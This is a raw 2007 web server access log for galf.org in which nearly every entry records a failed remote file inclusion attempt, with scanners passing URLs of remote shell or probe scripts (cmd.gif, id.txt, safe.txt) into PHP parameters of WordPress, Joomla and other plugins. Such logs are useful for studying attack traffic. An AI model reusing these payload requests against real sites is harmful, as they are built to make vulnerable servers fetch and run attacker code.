209.50.238.178 - - [16/Sep/2007:17:00:30 -0700] "GET /logs/access_070521.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
209.50.238.178 - - [16/Sep/2007:17:00:30 -0700] "GET /logs/access_070528.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:36 -0700] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:52 -0700] "GET /logs/access_070611.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070826.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070702.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070813.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070723.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:53 -0700] "GET /logs/access_070625.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access_070806.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access_070903.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access_070730.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access_070820.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:00:54 -0700] "GET /logs/access_070827.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
147.202.41.39 - - [16/Sep/2007:17:02:29 -0700] "GET /logs/index.php?p=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.202.41.39 - - [16/Sep/2007:17:02:29 -0700] "GET /index.php?p=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:30 -0700] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:46 -0700] "GET /logs/access_070611.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:46 -0700] "GET /logs/access_070826.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:46 -0700] "GET /logs/access_070702.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:46 -0700] "GET /logs/access_070813.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access_070723.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access_070625.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access_070806.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access_070903.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:47 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:48 -0700] "GET /logs/access_070730.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:48 -0700] "GET /logs/access_070820.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:02:48 -0700] "GET /logs/access_070827.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000"
205.134.232.99 - - [16/Sep/2007:17:03:31 -0700] "GET /logs/access_070820.log//skin/zero_vote/error.php?dir=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.101.20 - - [16/Sep/2007:17:03:41 -0700] "GET /s.php?table=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.159.171.178 - - [16/Sep/2007:17:03:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.admins.fi/banlist/queue/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:08:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:08:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
142.169.22.177 - - [16/Sep/2007:17:09:05 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 196608 "http://www.google.ca/search?q=%22_vti_bin/shtml.exe/_vti_rpc%22+%2Bclaroline&hl=fr&start=0&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
80.89.5.20 - - [16/Sep/2007:17:09:23 -0700] "GET /logs/components/com_contact/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.89.5.20 - - [16/Sep/2007:17:09:24 -0700] "GET /components/com_contact/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:10:25 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.50.238.178 - - [16/Sep/2007:17:10:25 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.e-juniper.com/media/cmd.gif? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:10:36 -0700] "GET /logs/access_070806.log/oneadmin/newspublish/include.php?path[docroot]=il%20tuo%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:10:36 -0700] "GET /oneadmin/newspublish/include.php?path[docroot]=il%20tuo%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:10:36 -0700] "GET /logs/oneadmin/newspublish/include.php?path[docroot]=il%20tuo%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:11:13 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:11:13 -0700] "GET /newspublish/include.php?path[docroot]=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:11:53 -0700] "GET /logs/access.log/oneadmin/newspublish/include.php?path[docroot]=il%20tuo%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:17:12:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:17:12:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.132 - - [16/Sep/2007:17:12:50 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://amurang.angelfire.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.132 - - [16/Sep/2007:17:12:50 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://amurang.angelfire.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:12:53 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:12:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:17:12:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:14:46 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:14:47 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:14:47 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.25.138 - - [16/Sep/2007:17:16:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.23.153 - - [16/Sep/2007:17:16:14 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.28.112.58 - - [16/Sep/2007:17:20:44 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:17:20:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.166.139 - - [16/Sep/2007:17:21:14 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.133.11.130 - - [16/Sep/2007:17:21:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.159.171.178 - - [16/Sep/2007:17:22:29 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.admins.fi/banlist/queue/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.159.171.178 - - [16/Sep/2007:17:22:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.admins.fi/banlist/queue/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:23:50 -0700] "GET /logs/access_070806.log/index.php?pagina=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:17:23:50 -0700] "GET /index.php?pagina=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:23:50 -0700] "GET /logs/index.php?pagina=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:26:06 -0700] "GET /logs/access_070827.log/index.php?pagina=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.8.90.221 - - [16/Sep/2007:17:26:25 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://vivomensagem.com.sapo.pt/cmd.txt?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
81.31.151.19 - - [16/Sep/2007:17:27:02 -0700] "GET /logs/index.php?tmp=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.151.19 - - [16/Sep/2007:17:27:03 -0700] "GET /index.php?tmp=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:27:07 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:27:50 -0700] "GET /logs/access.log/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:27:50 -0700] "GET /omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:27:50 -0700] "GET /logs/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:28:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.133.11.130 - - [16/Sep/2007:17:28:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
217.133.11.130 - - [16/Sep/2007:17:28:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.28.112.58 - - [16/Sep/2007:17:29:03 -0700] "GET /logs/access_070806.log/index.php?x=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:29:03 -0700] "GET /index.php?x=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:17:29:03 -0700] "GET /logs/index.php?x=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:29:04 -0700] "GET /logs/index.php?go=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:29:04 -0700] "GET /index.php?go=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:29:14 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:29:14 -0700] "GET //skin/zero_vote/error.php?dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:29:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:17:29:24 -0700] "GET /logs/access_070820.log//skin/zero_vote/error.php?dir=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.149.133.139 - - [16/Sep/2007:17:33:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.149.133.139 - - [16/Sep/2007:17:33:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.149.133.139 - - [16/Sep/2007:17:33:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/hierarkhy/agicmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.149.133.139 - - [16/Sep/2007:17:33:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/hierarkhy/agicmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.232.166.139 - - [16/Sep/2007:17:33:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:33:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:34:16 -0700] "GET /logs/access_070716.log/index.php?x=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.151.19 - - [16/Sep/2007:17:34:44 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.151.19 - - [16/Sep/2007:17:34:45 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:39:32 -0700] "GET /logs/access_070625.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:39:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:17:41:07 -0700] "GET /logs/access_070826.log/oneadmin/newspublish/include.php?path[docroot]=il%20tuo%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.94.70.147 - - [16/Sep/2007:17:42:10 -0700] "GET /logs/access.log/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jrada.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.94.70.147 - - [16/Sep/2007:17:42:11 -0700] "GET /xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jrada.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.94.70.147 - - [16/Sep/2007:17:42:12 -0700] "GET /logs/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jrada.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:46:51 -0700] "GET /logs/access.log//convert/mvcw.php?step=1&vwar_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:46:51 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:46:52 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.94.70.147 - - [16/Sep/2007:17:47:47 -0700] "GET /logs/access_070827.log/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jrada.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.28.112.58 - - [16/Sep/2007:17:48:16 -0700] "GET /logs/access_070730.log//skin/zero_vote/error.php?dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:49:28 -0700] "GET /logs//sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:49:28 -0700] "GET //sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:52:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.58.58 - - [16/Sep/2007:17:52:40 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sindromx.com/opp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.93.58.58 - - [16/Sep/2007:17:52:41 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sindromx.com/opp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:17:53:40 -0700] "GET /logs/access_070827.log//sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:57:19 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.125.18.34 - - [16/Sep/2007:17:57:20 -0700] "GET /modules/My_eGallery/index.php?basepath=http://66.197.156.75/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:59:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:59:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
